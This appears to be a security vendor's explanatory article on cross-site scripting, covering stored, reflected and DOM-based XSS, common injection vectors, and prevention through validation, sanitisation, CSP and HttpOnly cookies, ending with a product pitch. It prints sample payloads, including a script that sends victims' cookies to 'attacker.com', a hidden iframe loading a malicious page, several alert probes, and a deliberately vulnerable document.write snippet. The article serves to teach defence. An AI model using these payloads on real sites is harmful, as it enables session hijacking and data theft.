Cross Site Scripting (XSS) Attack: How It Works and How to Fix It

What Is Cross-Site Scripting (XSS) Attack? 

Cross-site scripting (XSS) is a security vulnerability commonly found in web applications. This flaw allows attackers to inject malicious scripts into content that other users view. 

Unlike other web attacks that target a website’s infrastructure, XSS exploits the trust a user has for a particular site, making it uniquely dangerous. Users unknowingly execute the malicious script on their browsers, thinking it’s a legitimate part of the website they are visiting, which can lead to unauthorized access to personal data, session hijacking, and other malicious activities.

The essence of an XSS attack lies in its ability to execute scripts in the context of a user’s session, allowing attackers to bypass browser access controls such as the same-origin policy—a mechanism that restricts how a document or script loaded by one domain or ‘origin’ can interact with a resource from another origin.

Web applications that allow users to input data without properly validating or escaping it are at risk. Websites that display content from other domains using iframes are also at risk. This vulnerability affects not only the security of the individual user but also the integrity of the website, as it can be used to defraud users, steal information, and spread malware.

This is part of a series of articles about browser security.

How Does XSS Work? 

Here is the typical process attackers follow to conduct an XSS attack:

1. Attacker injects script: An attacker finds a way to insert a malicious script into a webpage that other users will load. This could occur through a comment section, user profile data, or any input field that doesn’t adequately sanitize user-supplied data. 
2. Browser runs the script: When the victim visits the compromised page, their browser executes the script as if it were a legitimate part of the webpage. This execution occurs because the browser cannot distinguish between scripts that should be trusted and those that shouldn’t.
3. Script payload executes on user device: The malicious script executed can perform a variety of actions, from stealing cookies, which often contain session tokens, to manipulating the DOM of the webpage to display false information or capture user inputs. 

For example, an attacker could use XSS to change the contents of a webpage to trick users into entering their credentials, thinking they are logging into their accounts when, in reality, they are sending their information directly to the attacker.

The impact of an XSS attack varies based on the attacker’s intent, the nature of the application targeted, and the user’s interaction with the compromised page. An advanced XSS attack can lead to complete account takeover, personal data theft, and even the spread of the attack to other users through social engineering tactics embedded within the malicious script.

Types of XSS Attacks 

Stored XSS

Stored XSS, also known as persistent XSS, occurs when a malicious script is permanently stored on a target server, such as a database, message forum, visitor log, or comment field. The script is then served to users within the web application’s content. Whenever users access the compromised page or section, the stored script executes in their browser without their knowledge. 

This type of attack is particularly dangerous because it can affect many users and does not require them to take any specific action, like clicking on a malicious link, to fall victim to the exploit.

Reflected XSS

Reflected XSS, or non-persistent XSS, involves a malicious script being reflected off a web application to the user’s browser. The attack is typically delivered via email or another messaging platform where the victim is tricked into clicking a link containing the malicious script. 

Once clicked, the script travels to the vulnerable website, which reflects the attack back to the user’s browser. The browser then executes the script because it appears to have originated from the trusted website. This attack relies heavily on social engineering to convince the user to click on the malicious link.

DOM-based XSS

DOM-based XSS attacks occur when the attack payload is executed as a result of modifying the Document Object Model (DOM) of the application in the client’s browser. It does not involve a round trip to the server but works within the page’s client-side script itself. 

Attackers exploit the client-side code of a web application to execute malicious scripts, often through URL manipulation or malicious input that alters the DOM. This type of XSS is particularly insidious because it can be executed without any direct interaction with the web server, making detection and prevention more challenging.

XSS Examples 

Example of stored XSS

Consider a user profile page where users can input a description of themselves. An attacker might enter a script like this instead of a description:

<script>document.location='http://attacker.com/cookie_stealer.php?cookie='+document.cookie;</script>

If the website stores this script in its database without sanitization and displays it on profile pages, any visitor to this attacker’s profile will have their cookies sent to the attacker’s server, potentially compromising their session and personal data.

Example of reflected XSS

Consider a search form on a website that displays user input in the URL without proper sanitization. An attacker could craft a malicious URL like the following:

http://example.com/search?q=<script>alert(‘XSS’)</script>

When a user clicks on this link, the search term is reflected back in the webpage, causing the JavaScript alert box to pop up. This is a clear sign that the website is vulnerable to XSS, as it executes JavaScript code directly from the URL input.

Example of DOM-based XSS attack

Consider a website that uses JavaScript to take parameters from the URL and directly write them to the webpage. For example the JavaScript could look like this. It takes the user’s name from the URL and displays it in the HTML page:

document.write(decodeURIComponent(window.location.href.split("?name=")[1]));

If an attacker crafts a URL such as: 

http://example.com/#?name=<script>alert(‘XSS’)</script>

Visiting this URL would cause the script to execute, showcasing a DOM-based XSS vulnerability.

What Are the Primary Attack Vectors Used for XSS?

Here are the primary ways attackers exploit vulnerable websites to launch XSS attacks.

<script> Tag

The <script> tag is one of the most common vectors for XSS attacks. Attackers use it to inject malicious JavaScript code into web pages. When this tag is inserted into a web page through an unsecured input, the browser will execute the JavaScript code it contains. 

This can lead to various malicious outcomes, such as stealing user session tokens or defacing websites. Ensuring that user inputs do not directly lead to the insertion of <script> tags into rendered HTML is crucial for preventing these types of attacks.

JavaScript Events

JavaScript events, such as onmouseover and onclick, can be exploited as vectors for XSS attacks. Attackers may embed malicious JavaScript code within these event handlers. 

For example, an attacker could insert an image tag into a comment section with an onmouseover event that executes JavaScript when a user hovers over the image. Such tactics exploit the interactive nature of web content, triggering malicious scripts through seemingly innocuous user actions.

<body> Tag

The <body> tag can also serve as a vector for XSS attacks when attributes like onload are abused. An attacker could inject a payload such as <body onload=alert(‘XSS’)> into a page. 

If the website directly incorporates user input into its body without sanitization, this script will run when the page is loaded, demonstrating how even the basic structure of a webpage can be exploited for XSS.

<img> Tag

The <img> tag is another common attack vector, where attackers use attributes like onerror to execute JavaScript. An example payload could be: 

<img src="invalid.jpg" onerror="alert('XSS')">

This works because when the browser attempts to load the non-existent image, the onerror event fires, executing the attacker’s script. Filtering and escaping user inputs, especially in contexts where images can be uploaded or linked, is essential to prevent such exploits.

<iframe> Tag

Finally, the <iframe> tag can be manipulated for XSS attacks. Attackers might inject an <iframe> tag pointing to a malicious website or script. For instance, consider this code: 

<iframe src="http://malicious.com/xss.html" style="display:none;"></iframe> 

This can be used to execute scripts without the user’s knowledge, leveraging the iframe’s ability to include external content. Limiting or sanitizing the use of iframes, especially from untrusted sources, is a key measure against such vulnerabilities.

5 Ways to Prevent XSS Attacks

If you manage or develop websites and web applications, here are five ways to prevent XSS attacks against your online assets:

1. Validating Inputs

Validating inputs is the first line of defense against XSS attacks. This involves checking, filtering, and sanitizing user input to ensure it does not contain malicious scripts. Validation should occur both on the client side, to provide immediate feedback to the user, and on the server side, to protect against direct attacks that bypass client-side protections. 

Employing allowlists, which specify acceptable characters, rather than blocklists, can more effectively limit the potential for malicious input.

2. Sanitizing Data

Sanitizing data means transforming user input to ensure that it does not contain harmful scripts before it is displayed on the page or stored in the database. 

This process often involves stripping out or encoding potentially dangerous characters such as <, >, and &. Libraries and frameworks that automatically sanitize input, such as OWASP AntiSamy, can be invaluable tools in securing web applications against XSS.

3. Content Security Policy (CSP)

Implementing a Content Security Policy (CSP) can significantly reduce the risk of XSS attacks. CSP is a browser feature that allows web developers to control which resources the browser is allowed to load for a given page, including scripts, stylesheets, images, and more. 

By specifying a policy that only allows scripts from trusted sources and disallows inline scripts, developers can prevent many XSS attacks, even if an attacker can inject malicious code into the page.

4. Secure Cookies

Using secure cookies is another effective measure against XSS attacks. By setting cookies with the HttpOnly flag, they are made inaccessible to JavaScript running in the browser. This prevents attackers from stealing the user’s session cookies through XSS, thus mitigating the impact of an attack. 

Additionally, cookies can be set with the Secure flag, ensuring they are only sent over secure, encrypted connections, further protecting user data.

5. Educate and Train Developers

Finally, educating and training developers on secure coding practices is crucial in preventing XSS and other web application attacks. Understanding the nature of XSS vulnerabilities, recognizing common attack vectors, and learning to implement effective countermeasures can greatly improve the security of web applications. 

Regular security training, code reviews, and staying updated on the latest security trends and vulnerabilities are essential practices for maintaining web application security.

Related content: Read our guide to web security

Preventing XSS Attacks with Perception Point

Perception Point’s Advanced Browser Security adds enterprise-grade security to your organization’s native browsers to help protect against XSS attacks and other cyber threats across the digital workspace.

The managed solution fuses patented web technology with multi-layer advanced threat detection engines which delivers the unprecedented ability to detect and remediate all malicious threats from the web, including phishing, ransomware, malware, APTs, and more.

The behavior of the browser extension is managed in the cloud, while all of the computing resources run locally on user endpoints. This eliminates the need to invest in a large and costly infrastructure, and provides a better local user experience in terms of speed, along with offline availability.

We add advanced security to native browsers to protect your organization against all malicious threats from the web and protect access to sensitive corporate apps.

Contact us for a demo or download and to learn more about our Advanced Browser Security.